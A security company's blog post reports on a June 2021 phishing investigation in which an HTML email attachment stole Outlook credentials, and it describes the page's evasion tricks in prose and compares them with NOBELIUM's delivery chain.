MegaplanIT Blog's & Informational Resources

Whether you’re looking to secure your business or stay PCI compliant, MegaplanIT has a certified team of experts that can help you every step of the way. Stay informed with up-to-date blog.

Active Threat Investigations - June 2021

Posted by MegaplanIT on 6/9/21 11:38 AM

Credential Stealing Email Located

We recently had a phishing investigation into an email with an HTML attachment that caught our eye. The reason being is that Microsoft just recently posted about an ongoing attack from NOBELIUM which had a similar delivery technique to this investigation. The NOBELIUM attack structure was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO which drops an LNK file that will execute the Cobalt Strike Beacon loader. There’s a bit more to it than that but the HTML smuggling is where the path’s diverged with this attack luckily.


After we obtained the email from the client, we were able to dig into what was going on inside of the HTML attachment. The HTML was ‘obfuscated’, well when I say obfuscated, I really mean they “escaped” the characters in the document, something that is common with web requests. Very trivially, we were able to get the plaintext of the document and started to dig deeper into the functionality.



There were quite a few interesting things to note in this phishing campaign. The adversary did a great job at trying not to alert a user that they were in fact stealing their credentials. If a user reloaded the page more than 3 times the document would say “Scanned File Locked! Redirecting you back to your account” and would then take them back to Outlook. Also, it would prompt the user twice to enter their password telling them it was wrong each time (this is smart because many people mistype their password the first time) then the third time it would say “Scanned File Locked” and redirect them back to their Outlook page. The JavaScript on the page also dynamically pulled the image of the company off a website called based on the domain name of the targeted user to make the attack even more convincing. The website that the credentials are sent to was created 5-19-2021 and is hosting a default WordPress page with no content on it. We’ve since reported the site to the hosting provider and are waiting for it to be taken down.




We did not find any evidence of malware or a dropper functionality inside of the HTML file therefore our best recommendation was to change the affected user’s passwords.



Speak With A MegaplanIT Expert 

We look forward to talking to you about your upcoming Security Testing, Compliance Assessments, and Managed Security Services priorities. Looking to double-check if your digital infrastructure can withstand the latest cyber threats? The MegaplanIT team ready to help, Set up a meeting time at the link below.

Schedule Meeting


Topics: Insider, Managed Security Services

Leave Comment